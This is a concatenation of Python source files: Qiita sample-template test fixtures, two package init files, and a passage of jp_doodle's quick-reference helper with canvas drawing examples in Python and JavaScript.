with self.assertRaises(QiitaDBColumnError):
obs = load_template_to_dataframe(
StringIO(SAMPLE_TEMPLATE_INVALID_LATITUDE_COLUMNS))
# prevent flake8 from complaining
str(obs)
with self.assertRaises(QiitaDBColumnError):
obs = load_template_to_dataframe(
StringIO(SAMPLE_TEMPLATE_INVALID_LONGITUDE_COLUMNS))
# prevent flake8 from complaining
str(obs)
EXP_SAMPLE_TEMPLATE = (
"sample_name\tcollection_timestamp\tdescription\thas_extracted_data\t"
"has_physical_specimen\thost_subject_id\tint_column\tlatitude\tlongitude\t"
"physical_location\trequired_sample_info_status\tsample_type\tstr_column\n"
"2.Sample1\t2014-05-29 12:24:51\tTest Sample 1\tTrue\tTrue\tNotIdentified"
"\t1\t42.42\t41.41\tlocation1\treceived\ttype1\tValue for sample 1\n"
"2.Sample2\t2014-05-29 12:24:51\tTest Sample 2\tTrue\tTrue\tNotIdentified"
"\t2\t4.2\t1.1\tlocation1\treceived\ttype1\tValue for sample 2\n"
"2.Sample3\t2014-05-29 12:24:51\tTest Sample 3\tTrue\tTrue\tNotIdentified"
"\t3\t4.8\t4.41\tlocation1\treceived\ttype1\tValue for sample 3\n")
EXP_SAMPLE_TEMPLATE_DUPE_COLS = (
"sample_name\tcollection_timestamp\tdescription\thas_extracted_data\t"
"has_physical_specimen\thost_subject_id\tlatitude\tlongitude\t"
"physical_location\trequired_sample_info_status\tsample_type\t"
"str_column\tstr_column\n"
"2.Sample1\t2014-05-29 12:24:51\tTest Sample 1\tTrue\tTrue\t"
"NotIdentified\t42.42\t41.41\tlocation1\treceived\ttype1\t"
"Value for sample 1\tValue for sample 1\n"
"2.Sample2\t2014-05-29 12:24:51\t"
"Test Sample 2\tTrue\tTrue\tNotIdentified\t4.2\t1.1\tlocation1\treceived\t"
"type1\tValue for sample 2\tValue for sample 2\n"
"2.Sample3\t2014-05-29 12:24:51\tTest Sample 3\tTrue\t"
"True\tNotIdentified\t4.8\t4.41\tlocation1\treceived\ttype1\t"
"Value for sample 3\tValue for sample 3\n")
EXP_SAMPLE_TEMPLATE_FEWER_SAMPLES = (
"sample_name\tcollection_timestamp\tdescription\thas_extracted_data\t"
"has_physical_specimen\thost_subject_id\tint_column\tlatitude\t"
"longitude\tphysical_location\trequired_sample_info_status\tsample_type\t"
"str_column\n"
"2.Sample1\t2014-05-29 12:24:51\tTest Sample 1\tTrue\tTrue\tNotIdentified"
"\t1\t42.42\t41.41\tlocation1\treceived\ttype1\tValue for sample 1\n"
"2.Sample3\t2014-05-29 12:24:51\tTest Sample 3\tTrue\tTrue\tNotIdentified"
"\t3\t4.8\t4.41\tlocation1\treceived\ttype1\tValue for sample 3\n")
EXP_SAMPLE_TEMPLATE_SPACES = (
"sample_name\tcollection_timestamp\tdescription\thas_extracted_data\t"
"has_physical_specimen\thost_subject_id\tint_column\tlatitude\tlongitude\t"
"physical_location\trequired_sample_info_status\tsample_type\t"
"str_column\n"
"2.Sample1 \t2014-05-29 12:24:51\tTest Sample 1\tTrue\tTrue\t"
"NotIdentified\t1\t42.42\t41.41\tlocation1\treceived\ttype1\t"
"Value for sample 1\n"
"2.Sample2 \t2014-05-29 12:24:51\t"
"Test Sample 2\tTrue\tTrue\tNotIdentified\t2\t4.2\t1.1\tlocation1\t"
"received\ttype1\tValue for sample 2\n"
"2.Sample3\t2014-05-29 12:24:51\tTest Sample 3\tTrue\t"
"True\tNotIdentified\t3\t4.8\t4.41\tlocation1\treceived\ttype1\t"
"Value for sample 3\n")
EXP_SAMPLE_TEMPLATE_WHITESPACE = (
"sample_name \tcollection_timestamp\t description \thas_extracted_data\t"
"has_physical_specimen\thost_subject_id\tint_column\tlatitude\tlongitude\t"
"physical_location\trequired_sample_info_status\tsample_type\t"
"str_column\n"
"2.Sample1\t2014-05-29 12:24:51\tTest Sample 1\tTrue\tTrue\t"
"NotIdentified\t1\t42.42\t41.41\tlocation1\treceived\ttype1\t"
"Value for sample 1\n"
"2.Sample2\t 2014-05-29 12:24:51 \t"
"Test Sample 2\tTrue\tTrue\tNotIdentified\t2\t4.2\t1.1\tlocation1\t"
"received\ttype1\t Value for sample 2\n"
"2.Sample3\t2014-05-29 12:24:51\t Test Sample 3 \tTrue\t"
"True\tNotIdentified\t3\t4.8\t4.41\tlocation1\treceived\ttype1\t"
"Value for sample 3\n")
EXP_SAMPLE_TEMPLATE_SPACES_EMPTY_ROW = (
"sample_name\tcollection_timestamp\tdescription\thas_extracted_data\t"
"has_physical_specimen\thost_subject_id\tint_column\tlatitude\tlongitude\t"
"physical_location\trequired_sample_info_status\tsample_type\t"
"str_column\n"
"2.Sample1 \t2014-05-29 12:24:51\tTest Sample 1\tTrue\tTrue\t"
"NotIdentified\t1\t42.42\t41.41\tlocation1\treceived\ttype1\t"
"Value for sample 1\n"
"2.Sample2 \t2014-05-29 12:24:51\t"
"Test Sample 2\tTrue\tTrue\tNotIdentified\t2\t4.2\t1.1\tlocation1\t"
"received\ttype1\tValue for sample 2\n"
"2.Sample3\t2014-05-29 12:24:51\tTest Sample 3\tTrue\t"
"True\tNotIdentified\t3\t4.8\t4.41\tlocation1\treceived\ttype1\t"
"Value for sample 3\n"
"\t\t\t\t\t\t\t\t\t\t\t\t\n"
"\t\t\t\t\t\t\t\t\t\t\t\t\n")
EXP_ST_SPACES_EMPTY_COLUMN = (
"sample_name\tcollection_timestamp\tdescription\thas_extracted_data\t"
"has_physical_specimen\thost_subject_id\tint_column\tlatitude\tlongitude\t"
"physical_location\trequired_sample_info_status\tsample_type\t"
"str_column\t\n"
"2.Sample1 \t2014-05-29 12:24:51\tTest Sample 1\tTrue\tTrue\t"
"NotIdentified\t1\t42.42\t41.41\tlocation1\treceived\ttype1\t"
"Value for sample 1\t\n"
"2.Sample2 \t2014-05-29 12:24:51\t"
"Test Sample 2\tTrue\tTrue\tNotIdentified\t2\t4.2\t1.1\tlocation1\t"
"received\ttype1\tValue for sample 2\t\n"
"2.Sample3\t2014-05-29 12:24:51\tTest Sample 3\tTrue\t"
"True\tNotIdentified\t3\t4.8\t4.41\tlocation1\treceived\ttype1\t"
"Value for sample 3\t\n")
EXP_SAMPLE_TEMPLATE_NUMBER_SAMPLE_NAMES = (
"sample_name\tcollection_timestamp\tdescription\thas_extracted_data\t"
"has_physical_specimen\thost_subject_id\tlatitude\tlongitude\t"
"physical_location\trequired_sample_info_status\tsample_type\t"
"str_column\n"
"002.000\t2014-05-29 12:24:51\tTest Sample 1\tTrue\tTrue\t"
"NotIdentified\t42.42\t41.41\tlocation1\treceived\ttype1\t"
"Value for sample 1\n"
"1.11111\t2014-05-29 12:24:51\t"
"Test Sample 2\tTrue\tTrue\tNotIdentified\t4.2\t1.1\tlocation1\treceived\t"
"type1\tValue for sample 2\n"
"0.12121\t2014-05-29 12:24:51\tTest Sample 3\tTrue\t"
"True\tNotIdentified\t4.8\t4.41\tlocation1\treceived\ttype1\t"
"Value for sample 3\n")
SAMPLE_TEMPLATE_NO_SAMPLE_NAMES = (
"sample_name\tcollection_timestamp\tdescription\thas_extracted_data\t"
"has_physical_specimen\thost_subject_id\tint_column\tlatitude\tlongitude\t"
"physical_location\trequired_sample_info_status\tsample_type\t"
"str_column\n"
"2.Sample1\t2014-05-29 12:24:51\tTest Sample 1\tTrue\tTrue\t"
"NotIdentified\t1\t42.42\t41.41\tlocation1\treceived\ttype1\t"
"Value for sample 1\n"
"2.Sample2\t2014-05-29 12:24:51\t"
"Test Sample 2\tTrue\tTrue\tNotIdentified\t2\t4.2\t1.1\tlocation1\t"
"received\ttype1\tValue for sample 2\n"
"2.Sample3\t2014-05-29 12:24:51\tTest Sample 3\tTrue\t"
"True\tNotIdentified\t3\t4.8\t4.41\tlocation1\treceived\ttype1\t"
"Value for sample 3\n"
"\t2014-05-29 12:24:51\tTest Sample 3\tTrue\t"
"True\tNotIdentified\t4.8\t4.41\tlocation1\treceived\ttype1\t"
"Value for sample 3\n"
"\t\t\t\t\t\t\t\t\t\t\t\n"
)
SAMPLE_TEMPLATE_NO_SAMPLE_NAMES_SOME_SPACES = (
"sample_name\tcollection_timestamp\tdescription\thas_extracted_data\t"
"has_physical_specimen\thost_subject_id\tint_column\tlatitude\tlongitude\t"
"physical_location\trequired_sample_info_status\tsample_type\t"
"str_column\n"
"2.Sample1\t2014-05-29 12:24:51\tTest Sample 1\tTrue\tTrue\t"
"NotIdentified\t1\t42.42\t41.41\tlocation1\treceived\ttype1\t"
"Value for sample 1\n"
"2.Sample2\t2014-05-29 12:24:51\t"
"Test Sample 2\tTrue\tTrue\tNotIdentified\t2\t4.2\t1.1\tlocation1\t"
"received\ttype1\tValue for sample 2\n"
"2.Sample3\t2014-05-29 12:24:51\tTest Sample 3\tTrue\t"
"True\tNotIdentified\t3\t4.8\t4.41\tlocation1\treceived\ttype1\t"
"Value for sample 3\n"
"\t\t\t\t\t \t\t\t\t\t \t\t\n"
)
SAMPLE_TEMPLATE_EMPTY_COLUMN = (
"sample_name\tcollection_timestamp\tdescription\thas_extracted_data\t"
"has_physical_specimen\thost_subject_id\tlatitude\tlongitude\t"
"physical_location\trequired_sample_info_status\tsample_type\t"
"str_column\n"
"2.Sample1\t2014-05-29 12:24:51\tTest Sample 1\tTrue\tTrue\t"
"NotIdentified\t42.42\t41.41\tlocation1\treceived\ttype1\t"
"\n"
"2.Sample2\t2014-05-29 12:24:51\t"
"Test Sample 2\tTrue\tTrue\tNotIdentified\t4.2\t1.1\tlocation1\treceived\t"
"type1\t\n"
"2.Sample3\t2014-05-29 12:24:51\tTest Sample 3\tTrue\t"
"True\tNotIdentified\t4.8\t4.41\tlocation1\treceived\ttype1\t"
"\n")
SAMPLE_TEMPLATE_COLUMN_WITH_NAS = (
"sample_name\tcollection_timestamp\tdescription\thas_extracted_data\t"
"has_physical_specimen\thost_subject_id\tlatitude\tlongitude\t"
"physical_location\trequired_sample_info_status\tsample_type\t"
"str_column\n"
"2.Sample1\t2014-05-29 12:24:51\tTest Sample 1\tTrue\tTrue\t"
"NotIdentified\t42.42\t41.41\tlocation1\treceived\ttype1\t"
"NA\n"
"2.Sample2\t2014-05-29 12:24:51\t"
"Test Sample 2\tTrue\tTrue\tNotIdentified\t4.2\t1.1\tlocation1\treceived\t"
"type1\tNA\n"
"2.Sample3\t2014-05-29 12:24:51\tTest Sample 3\tTrue\t"
"True\tNotIdentified\t4.8\t4.41\tlocation1\treceived\ttype1\t"
"NA\n")
SAMPLE_TEMPLATE_NO_SAMPLE_NAME = (
":L}={\tcollection_timestamp\tdescription\thas_extracted_data\t"
"has_physical_specimen\thost_subject_id\tlatitude\tlongitude\t"
"physical_location\trequired_sample_info_status\tsample_type\t"
"str_column\n"
"2.Sample1\t2014-05-29 12:24:51\tTest Sample 1\tTrue\tTrue\t"
"NotIdentified\t42.42\t41.41\tlocation1\treceived\ttype1\t"
"NA\n"
"2.Sample2\t2014-05-29 12:24:51\t"
"Test Sample 2\tTrue\tTrue\tNotIdentified\t4.2\t1.1\tlocation1\treceived\t"
"type1\tNA\n"
"2.Sample3\t2014-05-29 12:24:51\tTest Sample 3\tTrue\t"
"True\tNotIdentified\t4.8\t4.41\tlocation1\treceived\ttype1\t"
"NA\n")
SAMPLE_TEMPLATE_INVALID_LATITUDE_COLUMNS = (
"sample_name\tcollection_timestamp\tdescription\thas_extracted_data\t"
"has_physical_specimen\thost_subject_id\tlatitude\tlongitude\t"
"physical_location\trequired_sample_info_status\tsample_type\t"
"str_column\n"
"2.Sample1\t2014-05-29 12:24:51\tTest Sample 1\tTrue\tTrue\t"
"1\t42\t41.41\tlocation1\treceived\ttype1\t"
"Value for sample 1\n"
"2.Sample2\t2014-05-29 12:24:51\t"
"Test Sample 2\tTrue\tTrue\1\t4.2\t1.1\tlocation1\treceived\t"
"type1\tValue for sample 2\n"
"2.Sample3\t2014-05-29 12:24:51\tTest Sample 3\tTrue\t"
"True\1\tXXXXX4.8\t4.41\tlocation1\treceived\ttype1\t"
"Value for sample 3\n")
SAMPLE_TEMPLATE_INVALID_LONGITUDE_COLUMNS = (
"sample_name\tcollection_timestamp\tdescription\thas_extracted_data\t"
"has_physical_specimen\thost_subject_id\tlatitude\tlongitude\t"
"physical_location\trequired_sample_info_status\tsample_type\t"
"str_column\n"
"2.Sample1\t2014-05-29 12:24:51\tTest Sample 1\tTrue\tTrue\t"
"1\t11.42\t41.41\tlocation1\treceived\ttype1\t"
"Value for sample 1\n"
"2.Sample2\t2014-05-29 12:24:51\t"
"Test Sample 2\tTrue\tTrue\1\t4.2\tXXX\tlocation1\treceived\t"
"type1\tValue for sample 2\n"
"2.Sample3\t2014-05-29 12:24:51\tTest Sample 3\tTrue\t"
"True\1\t4.8\t4.XXXXX41\tlocation1\treceived\ttype1\t"
"Value for sample 3\n")
SAMPLE_TEMPLATE_DICT_FORM = {
'collection_timestamp': {'2.Sample1': '2014-05-29 12:24:51',
'2.Sample2': '2014-05-29 12:24:51',
'2.Sample3': '2014-05-29 12:24:51'},
'description': {'2.Sample1': 'Test Sample 1',
'2.Sample2': 'Test Sample 2',
'2.Sample3': 'Test Sample 3'},
'has_extracted_data': {'2.Sample1': True,
'2.Sample2': True,
'2.Sample3': True},
'has_physical_specimen': {'2.Sample1': True,
'2.Sample2': True,
'2.Sample3': True},
'host_subject_id': {'2.Sample1': 'NotIdentified',
'2.Sample2': 'NotIdentified',
'2.Sample3': 'NotIdentified'},
'latitude': {'2.Sample1': 42.420000000000002,
'2.Sample2': 4.2000000000000002,
'2.Sample3': 4.7999999999999998},
'longitude': {'2.Sample1': 41.409999999999997,
'2.Sample2': 1.1000000000000001,
'2.Sample3': 4.4100000000000001},
'physical_location': {'2.Sample1': 'location1',
'2.Sample2': 'location1',
'2.Sample3': 'location1'},
'required_sample_info_status': {'2.Sample1': 'received',
'2.Sample2': 'received',
'2.Sample3': 'received'},
'sample_type': {'2.Sample1': 'type1',
'2.Sample2': 'type1',
'2.Sample3': 'type1'},
'str_column': {'2.Sample1': 'Value for sample 1',
'2.Sample2': 'Value for sample 2',
'2.Sample3': 'Value for sample 3'},
'int_column': {'2.Sample1': 1,
'2.Sample2': 2,
'2.Sample3': 3}
}
SAMPLE_TEMPLATE_NUMBER_SAMPLE_NAMES_DICT_FORM = {
'collection_timestamp': {'002.000': '2014-05-29 12:24:51',
'1.11111': '2014-05-29 12:24:51',
'0.12121': '2014-05-29 12:24:51'},
'description': {'002.000': 'Test Sample 1',
'1.11111': 'Test Sample 2',
'0.12121': 'Test Sample 3'},
'has_extracted_data': {'002.000': True,
'1.11111': True,
'0.12121': True},
'has_physical_specimen': {'002.000': True,
'1.11111': True,
'0.12121': True},
'host_subject_id': {'002.000': 'NotIdentified',
'1.11111': 'NotIdentified',
'0.12121': 'NotIdentified'},
'latitude': {'002.000': 42.420000000000002,
'1.11111': 4.2000000000000002,
'0.12121': 4.7999999999999998},
'longitude': {'002.000': 41.409999999999997,
'1.11111': 1.1000000000000001,
'0.12121': 4.4100000000000001},
'physical_location': {'002.000': 'location1',
'1.11111': 'location1',
'0.12121': 'location1'},
'required_sample_info_status': {'002.000': 'received',
'1.11111': 'received',
'0.12121': 'received'},
'sample_type': {'002.000': 'type1',
'1.11111': 'type1',
'0.12121': 'type1'},
'str_column': {'002.000': 'Value for sample 1',
'1.11111': 'Value for sample 2',
'0.12121': 'Value for sample 3'}}
ST_EMPTY_COLUMN_DICT_FORM = \
{'collection_timestamp': {'2.Sample1': '2014-05-29 12:24:51',
'2.Sample2': '2014-05-29 12:24:51',
'2.Sample3': '2014-05-29 12:24:51'},
'description': {'2.Sample1': 'Test Sample 1',
'2.Sample2': 'Test Sample 2',
'2.Sample3': 'Test Sample 3'},
'has_extracted_data': {'2.Sample1': True,
'2.Sample2': True,
'2.Sample3': True},
'has_physical_specimen': {'2.Sample1': True,
'2.Sample2': True,
'2.Sample3': True},
'host_subject_id': {'2.Sample1': 'NotIdentified',
'2.Sample2': 'NotIdentified',
'2.Sample3': 'NotIdentified'},
'latitude': {'2.Sample1': 42.420000000000002,
'2.Sample2': 4.2000000000000002,
'2.Sample3': 4.7999999999999998},
'longitude': {'2.Sample1': 41.409999999999997,
'2.Sample2': 1.1000000000000001,
'2.Sample3': 4.4100000000000001},
'physical_location': {'2.Sample1': 'location1',
'2.Sample2': 'location1',
'2.Sample3': 'location1'},
'required_sample_info_status': {'2.Sample1': 'received',
'2.Sample2': 'received',
'2.Sample3': 'received'},
'sample_type': {'2.Sample1': 'type1',
'2.Sample2': 'type1',
'2.Sample3': 'type1'}}
ST_COLUMN_WITH_NAS_DICT_FORM = \
{'collection_timestamp': {'2.Sample1': '2014-05-29 12:24:51',
'2.Sample2': '2014-05-29 12:24:51',
'2.Sample3': '2014-05-29 12:24:51'},
'description': {'2.Sample1': 'Test Sample 1',
'2.Sample2': 'Test Sample 2',
'2.Sample3': 'Test Sample 3'},
'has_extracted_data': {'2.Sample1': True,
'2.Sample2': True,
'2.Sample3': True},
'has_physical_specimen': {'2.Sample1': True,
'2.Sample2': True,
'2.Sample3': True},
'host_subject_id': {'2.Sample1': 'NotIdentified',
'2.Sample2': 'NotIdentified',
'2.Sample3': 'NotIdentified'},
'latitude': {'2.Sample1': 42.420000000000002,
'2.Sample2': 4.2000000000000002,
'2.Sample3': 4.7999999999999998},
'longitude': {'2.Sample1': 41.409999999999997,
'2.Sample2': 1.1000000000000001,
'2.Sample3': 4.4100000000000001},
'physical_location': {'2.Sample1': 'location1',
'2.Sample2': 'location1',
'2.Sample3': 'location1'},
'required_sample_info_status': {'2.Sample1': 'received',
'2.Sample2': 'received',
'2.Sample3': 'received'},
'sample_type': {'2.Sample1': 'type1',
'2.Sample2': 'type1',
'2.Sample3': 'type1'},
'str_column': {'2.Sample1': 'NA', '2.Sample2': 'NA', '2.Sample3': 'NA'}}
EXP_PREP_TEMPLATE = (
'sample_name\tbarcodesequence\tcenter_name\tcenter_project_name\t'
'ebi_submission_accession\temp_status\texperiment_design_description\t'
'library_construction_protocol\tlinkerprimersequence\tplatform\t'
'run_prefix\tstr_column\n'
'1.SKB7.640196\tCCTCTGAGAGCT\tANL\tTest Project\tNone\tEMP\tBBBB\tAAAA\t'
'GTGCCAGCMGCCGCGGTAA\tILLUMINA\ts_G1_L002_sequences\tValue for sample 3\n'
'1.SKB8.640193\tGTCCGCAAGTTA\tANL\tTest Project\tNone\tEMP\tBBBB\tAAAA\t'
'GTGCCAGCMGCCGCGGTAA\tILLUMINA\ts_G1_L001_sequences\tValue for sample 1\n'
'1.SKD8.640184\tCGTAGAGCTCTC\tANL\tTest Project\tNone\tEMP\tBBBB\tAAAA\t'
'GTGCCAGCMGCCGCGGTAA\tILLUMINA\ts_G1_L001_sequences\tValue for sample 2\n')
if __name__ == '__main__':
main()
# lemmiwinks/extractor/__init__.py (nesfit/WPD, MIT license)
from .extractor import RegexExtractor
# cvplus/__init__.py (AndyTsangChun/cvutil, Apache-2.0 license)
from .py_logger import PyLogger
from .color_util import genColors
from .color_util import hsv2rgb
from .color_util import rgb2hex
from .cv_util import getTextBoxRatio
from .cv_util import drawDashedLine
from .cv_util import location2bbox
from .cv_util import bbox2location
from .cv_util import bbox_iou
from .cv_util import interval_overlap
from .img_util import normalize
from .img_util import getDownSampleImage
from .img_util import getCroppedImage
from .img_util import npa2base64
from .img_util import base642npa
from .img_util import saveImgRGB
from .img_util import PIL2CV
from .img_util import CV2PIL
from .img_util import getCenterPoint
from .img_util import distanceOfpoints
from .model import *
# docs/quick_references/qr_helper.py (lingruiluo/jp_doodle, BSD-2-Clause license)
from jp_doodle.dual_canvas import swatch
from jp_doodle.auto_capture import embed_hidden, PythonExample, JavascriptExample
import inspect
# widen the notebook
from jp_doodle import data_tables
data_tables.widen_notebook()
DO_EMBEDDINGS = False
def show(frame, file_prefix=None, do_display=True):
if DO_EMBEDDINGS:
if file_prefix is None:
file_prefix = inspect.stack()[1][3]
filename = file_prefix + ".png"
canvas_widget = frame.get_canvas()
with embed_hidden(canvas_widget, filename):
if do_display:
frame.show()
else:
if do_display:
frame.show()
def python_example(markdown, code, width=320, height=120, embeddable=True):
file_prefix = inspect.stack()[1][3]
filename = file_prefix + ".png"
EG = PythonExample(markdown, code, filename, width, height, embeddable=embeddable)
EG.embed_prologue()
EG.embed_code()
EG.embed_widget(DO_EMBEDDINGS)
def js_example(markdown, code, width=320, height=120, axes=True, embeddable=True):
file_prefix = inspect.stack()[1][3]
filename = file_prefix + ".png"
EG = JavascriptExample(markdown, code, filename, width, height, axes=axes, embeddable=embeddable)
EG.embed_prologue()
EG.embed_code()
EG.embed_widget(DO_EMBEDDINGS)
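# The example helpers above name their screenshot file after the calling
# function via `inspect.stack()[1][3]`. A minimal, self-contained sketch of
# that caller-name convention (the `_caller_name` and `my_example` names
# below are illustrative, not part of jp_doodle):

```python
import inspect

def _caller_name():
    # Frame 0 is _caller_name itself; frame 1 is whoever called it.
    # Field 3 of a stack entry is the function name.
    return inspect.stack()[1][3]

def my_example():
    # Mirrors how python_example/js_example derive their PNG prefix.
    return _caller_name() + ".png"

print(my_example())  # my_example.png
```

# Because the prefix comes from the caller's own name, each quick-reference
# function below gets a distinct, predictable image filename.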
def js_frame_example():
return js_example(
"""
### Create a reference frame inside a dual canvas
Pixel coordinates are rarely the most convenient coordinate systems to
use for scientific visualizations. Reference frames allow drawing using
transformed coordinates. The `frame_region` method creates a frame
by mapping reference points in the pixel space to reference
points in the reference frame coordinate space. Objects can then
be drawn on the reference frame and the underlying coordinates will be
converted automatically.
The following Javascript creates a reference `frame` from the canvas `element`
and draws some reference marks on the frame. Reference axes in canvas coordinates
are also shown in grey.
""",
"""
// Map pixel coords (10,10) and (400,100)
// to frame coords (-1, 0) and (1, 2)
var frame = element.frame_region(
10, 10, 400, 100,
-1, 0, 1, 2);
// draw some reference marks on the frame:
frame.text({x:-1, y:0, text:"-1,0", color:"red", background:"yellow"} );
frame.text({x:1, y:2, text:"1,2", align:"right", color:"red", background:"yellow"} );
frame.lower_left_axes({min_x:-1, min_y:0, max_x:1,
max_y:2, x_anchor:0, y_anchor:1, max_tick_count:5, color:"blue"})
"""
)
def js_lasso_example():
return js_example(
"""
### Selecting named objects by surrounding them with a lasso
The
```
element.do_lasso(callback, config, delete_after)
```
method allows the user to select named objects
by surrounding them with a graphical loop. After the loop is complete the callback
receives a dictionary mapping the names of the selected objects to their descriptions.
The optional argument `config` provides configuration parameters and the
optional boolean argument `delete_after` deletes the lasso polygon after selection
if `true`.
""",
"""
// draw some named objects on the canvas
for (var i=10; i<300; i+=40) {
for (var j=10; j<100; j+=15) {
var ijtext = i+","+j
element.text({x:i, y:j, text:ijtext, name:ijtext, color:"red", background:"yellow"} );
}
}
// Add a text area to display the result of the lasso operation:
var info = $("<div/>").appendTo(element);
info.html("Mouse down and encircle elements to select them with the lasso.");
var lasso_callback = function(mapping) {
var txt = "Lasso circled: ";
for (var name in mapping) {
txt += " (" + name + "),";
}
info.html(txt);
}
element.do_lasso(lasso_callback, {}, true);
"""
)
def js_mouse_tracking_example():
return js_example(
"""
### Mouse tracking
The following code tracks mouse moves over the whole canvas
and moves an external HTML DIV and a canvas circle in coordination
with the pointer position.
""",
"""
// Mouse tracking DIV
let tooltip = $("<div>Move the mouse over the canvas.</div>").appendTo(element);
tooltip.css({background: "yellow", width:120});
// Mouse tracking circle
let circle = element.circle({name:true, x:10, y:10, r:13, color: "red"});
var event_handler = function(event) {
var element_offset = element.visible_canvas.offset();
var canvas_location = element.event_model_location(event);
var pixel_offset = element.event_pixel_location(event);
// move the tooltip near the mouse
tooltip.offset({
left: pixel_offset.x + element_offset.left + 5,
top: pixel_offset.y + element_offset.top + 5,
});
// move the circle under the mouse.
circle.change({x:canvas_location.x, y:canvas_location.y});
// Report canvas position in the tooltip
tooltip.html("x=" + Math.floor(canvas_location.x)
+ "<br> y=" + Math.floor(canvas_location.y));
};
element.on_canvas_event("mousemove", event_handler);
"""
)
def js_event_callback():
return js_example(
"""
### Displaying mouse move coordinates
The following widget contains a `rectangle` drawn on a `frame`.
The `model_location` coordinates for a `mousemove` over the rectangle
are reported in an appended `info_div` text area. The `model_location`
gives coordinates for the reference frame associated with the object.
""",
"""
// Map pixel coords (10,10) and (400,100)
// to frame coords (-1, 0) and (1, 2)
var frame = element.frame_region(
10, 10, 400, 100,
-1, 0, 1, 2);
// Create a named rectangle to receive events.
var rectangle = frame.frame_rect({x:-0.8, y:0.1, w:1.3, h:1.9, color:"cyan", name:true});
frame.lower_left_axes({min_x:-1, min_y:0, max_x:1,
max_y:2, x_anchor:0, y_anchor:1, max_tick_count:5, color:"blue"});
var info_div = $("<div/>").appendTo(element);
info_div.html("Please mouse over the cyan rectangle");
var mouse_over_handler = function(event) {
var x = event.model_location.x;
var y = event.model_location.y;
info_div.html("x=" + x + "; y=" + y);
};
// Attach the event handler to the rectangle.
rectangle.on("mousemove", mouse_over_handler);
"""
)
def js_2_frame_example():
return js_example(
"""
### Create two reference frames inside a dual canvas
It is possible to create many reference frames inside a dual canvas, each with a different
coordinate transform. The following Javascript places two canvases side-by-side and
annotates them similarly using the same frame coordinates.
""",
"""
// Map pixel coords (10,10) and (190,100) to frame coords (-1, 0) and (1, 2) in frame1
var frame1 = element.frame_region(
10, 10, 190, 100,
-1, 0, 1, 2);
// draw some reference marks on frame1:
frame1.text({x:-1, y:0, text:"-1,0", color:"red", background:"yellow"} );
frame1.text({x:1, y:2, text:"1,2", align:"right", color:"red", background:"yellow"} );
frame1.lower_left_axes({min_x:-1, min_y:0, max_x:1,
max_y:2, x_anchor:0, y_anchor:1, max_tick_count:5, color:"blue"})
// Map pixel coords (210,10) and (400,100) to frame coords (-1, 0) and (1, 2) in frame2
var frame2 = element.frame_region(
210, 10, 400, 100,
-1, 0, 1, 2);
// draw some reference marks on frame2:
frame2.text({x:-1, y:0, text:"-1,0", color:"red", background:"cyan"} );
frame2.text({x:1, y:2, text:"1,2", align:"right", color:"red", background:"cyan"} );
frame2.lower_left_axes({min_x:-1, min_y:0, max_x:1,
max_y:2, x_anchor:0, y_anchor:1, max_tick_count:5, color:"green"})
"""
)
def py_arrow_example():
return python_example(
"""
### Drawing arrows
The `arrow` method draws an arrow between a head position and a tail position.
""",
'''
widget.arrow(
head_length=30,
x1=50, y1=10, # The tail end point of the line
x2=320, y2=70, # The head end point of the line
color="red", # Optional color (default: "black")
lineWidth=4, # Optional line width
lineDash=[2,2], # Optional line dash pattern
head_angle=45, # Optional head segment angle in degrees (default 45)
head_offset=10, # Optional offset of head from endpoint
symmetric=True, # If true draw two arrow head segments (default False)
)
''')
def js_arrow_example():
return js_example(
"""
### Drawing arrows
The `arrow` method draws an arrow between a head position and a tail position.
""",
'''
element.arrow({
head_length:30,
x1:50, y1:10, // The tail end point of the line
x2:320, y2:70, // The head end point of the line
color:"red", // Optional color (default: "black")
lineWidth:4, // Optional line width
lineDash:[2,2], // Optional line dash pattern
head_angle:45, // Optional head segment angle in degrees (default 45)
head_offset:10, // Optional offset of head from endpoint
symmetric:true, // If true draw two arrow head segments (default False)
});
''')
def py_double_arrow_example():
return python_example(
"""
### Drawing double arrows
The `double_arrow` method draws an arrow between a head position and a tail position
with head marks at both ends.
""",
'''
widget.double_arrow(
head_length=30,
x1=50, y1=10, # The tail end point of the line
x2=320, y2=70, # The head end point of the line
color="red", # Optional color (default: "black")
back_color="blue", # Optional color of back arrow
lineWidth=4, # Optional line width
lineDash=[2,2], # Optional line dash pattern
head_angle=45, # Optional head segment angle in degrees (default 45)
back_angle=90, # Optional back head segment angle
head_offset=10, # Optional offset of head from endpoint
back_offset=0, # Optional, offset of back pointing head mark
symmetric=False, # If true draw two arrow head segments (default False)
line_offset=5, # offset of back arrow from forward arrow
)
''')
def js_double_arrow_example():
return js_example(
"""
### Drawing double arrows
The `double_arrow` method draws an arrow between a head position and a tail position
with head marks at both ends.
""",
'''
element.double_arrow({
head_length:30,
x1:50, y1:10, // The tail end point of the line
x2:320, y2:70, // The head end point of the line
color:"red", // Optional color (default: "black")
back_color:"blue", // Optional color of back arrow
lineWidth:4, // Optional line width
lineDash:[2,2], // Optional line dash pattern
head_angle:45, // Optional head segment angle in degrees (default 45)
back_angle:90, // Optional back head segment angle
head_offset:10, // Optional offset of head from endpoint
back_offset:0, // Optional, offset of back pointing head mark
symmetric:false, // If true draw two arrow head segments (default False)
line_offset:5, // offset of back arrow from forward arrow
});
''')
def py_event_example():
return python_example(
"""
### Attaching event callbacks
The `object.on(etype, callback)` method
attaches a `callback` to be called when the object
receives an event of type `etype`.
""",
'''
# this circle cannot be mutated and does not respond to events because it is not named.
widget.circle(x=0, y=0, r=100, color="#e99")
# this text is named and can be mutated and can respond to events
txt1 = widget.text(x=0, y=0, text="Hello World", degrees=45, name=True,
font= "40pt Arial", color="#ee3", background="#9e9", align="center", valign="center")
# add a click event bound to the txt which transitions the text rotation
def on_click(*ignored):
txt1.transition(text="That tickles", degrees=720, color="#f90", background="#009", seconds_duration=5)
txt1.on("click", on_click)
''')
def py_line_example():
return python_example(
"""
### Drawing lines
The `line` method draws a line segment between two end points.
""",
'''
widget.line(
x1=50, y1=10, # One end point of the line
x2=320, y2=30, # The other end point of the line
color="cyan", # Optional color (default: "black")
lineWidth=4, # Optional line width
lineDash=[5,2,1], # Optional line dash pattern
)
''')
def js_line_example():
return js_example(
"""
### Drawing lines
The `line` method draws a line segment between two end points.
""",
'''
element.line({
x1:50, y1:10, // One end point of the line
x2:320, y2:100, // The other end point of the line
color:"cyan", // Optional color (default: "black")
lineWidth:4, // Optional line width
lineDash:[5,2,1], // Optional line dash pattern
})
''')
def py_polyline_example():
return python_example(
"""
### Drawing polylines
The `polyline` method draws a sequence of connected line segments.
""",
'''
